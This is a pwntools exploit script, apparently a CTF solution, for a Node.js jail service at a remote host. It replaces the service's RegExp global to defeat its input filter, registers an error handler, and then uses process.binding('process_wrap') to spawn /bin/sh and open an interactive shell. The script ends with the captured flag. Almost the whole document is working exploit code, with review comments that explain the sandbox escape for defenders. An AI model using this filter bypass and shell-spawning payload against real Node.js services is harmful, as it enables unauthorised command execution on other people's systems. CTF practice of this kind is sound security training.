@bennofs
Created September 15, 2017 14:11
#!/usr/bin/env python2
from pwn import *
# Characters the author recorded as "bad": '[', ']', a backslash and '.'.
# NOTE(review): presumably the characters the remote input filter rejects;
# nothing in the visible script reads this value -- confirm before relying on it.
badchars = "[]\\."

# JavaScript source for a factory whose returned object has a test() method
# that always answers false. initialize() assigns it to the remote RegExp
# global, so any check built on `new RegExp(...).test(...)` stops matching.
regex_nop = 'function(){ return {"test": function() { return false; }}}'
def run(conn, payload):
    """Send one JavaScript snippet to the service as a single input line.

    The snippet is trimmed and its newlines are turned into ';' so that a
    multi-line payload fits the line-oriented prompt. The line that is sent
    first rebinds ``hangup`` to an empty function and ends with a call to
    ``ask()``.
    NOTE(review): ``hangup`` and ``ask`` are names in the remote program;
    presumably this keeps the session open and re-issues the prompt -- confirm
    against the challenge source.

    Args:
        conn: object exposing ``sendlineafter(delimiter, data)`` (a pwntools
            tube in this script).
        payload: JavaScript source text; may span several lines.
    """
    # After strip() the text has no newline at either end, so joining the
    # pieces with ';' cannot introduce leading or trailing whitespace.
    statements = payload.strip().split("\n")
    one_liner = ";".join(statements)
    line = "{}{}{}".format('hangup=function(){};', one_liner, "; ask()")
    conn.sendlineafter("Phone #> ", line)
def initialize():
    """Connect to the challenge service and prepare its JavaScript context.

    Two setup lines are sent through run():

    1. ``RegExp`` is reassigned to the ``regex_nop`` stub, which removes the
       service's regex-based input check (every ``test()`` now returns false).
       For defenders: a filter that depends on a mutable global living in the
       same interpreter as the untrusted code can be replaced by that code.
    2. An ``uncaughtException`` handler is registered that logs the error,
       prints a line of 60 dashes and calls ``ask()`` again.

    Returns:
        The open connection object created by ``remote``.
    """
    # The handler text is prepared before connecting. replace(" ", "") drops
    # every space from it; run() later converts its newlines to ';'.
    handler_template = '''process.on('uncaughtException', (err) => {{
console.log(err);
console.log("{}")
ask();
}});
'''
    divider = "-" * 60
    handler_js = handler_template.format(divider).replace(" ", "")

    conn = remote("jail.alieni.se", 55542)
    # Order matters: the check is removed first, then the handler is installed.
    for setup_js in ("RegExp=" + regex_nop, handler_js):
        run(conn, setup_js)
    return conn
# JavaScript sent as the final payload. It takes the Process class from the
# internal binding process.binding("process_wrap"), creates an instance, gives
# it a no-op onexit callback, and spawns /bin/sh with its three stdio entries
# set to file descriptors 0, 1 and 2.
# For defenders: this works because the `process` global is reachable from the
# evaluated code, so Node's internal bindings are reachable as well; a regex
# filter on the input text does not constrain them.
script = '''
var Process = process.binding("process_wrap").Process;
p = new Process();
p.onexit = function(exitCode, signalCode) {};
p.spawn({ file: "/bin/sh", stdio: [{type: "fd", fd: 0}, {type: "fd", fd: 1}, {type: "fd", fd: 2}]});
'''
# Runs at import time: connect and prepare the remote context, send the
# payload, then hand the connection over to the terminal for interactive use.
# The statements must stay in this order.
conn = initialize()
run(conn, script)
conn.interactive()
# flag = SECT{1ts_1n_th4T_pl4Ce_Wh3re_1_Pu7_tH4t_Th1ng_th4T_t1m3,}